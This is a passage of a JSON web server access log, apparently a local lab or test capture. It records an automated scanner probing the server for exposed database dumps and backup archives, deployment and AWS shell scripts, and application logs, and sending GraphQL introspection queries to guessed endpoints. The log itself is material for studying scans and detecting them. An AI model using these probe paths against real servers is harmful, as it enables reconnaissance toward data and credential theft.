like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.407","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.739","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.126","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.462","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.782","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:37 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:37 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:38 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.431","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.874","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.534","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.987","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.446","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:40 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.510","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.359","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:41 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.890","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.149","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:45 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:46 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.752","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:47 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sqlite HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.458","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:47 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.563","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.413","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:50 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.547","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.509","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.437","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.632","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:54 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.573","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.531","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.532","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.436","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.424","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.455","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:57 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:58 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.955","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.489","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.572","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.548","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.110","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.075","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:05 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.462","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.105","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.444","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:04:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) 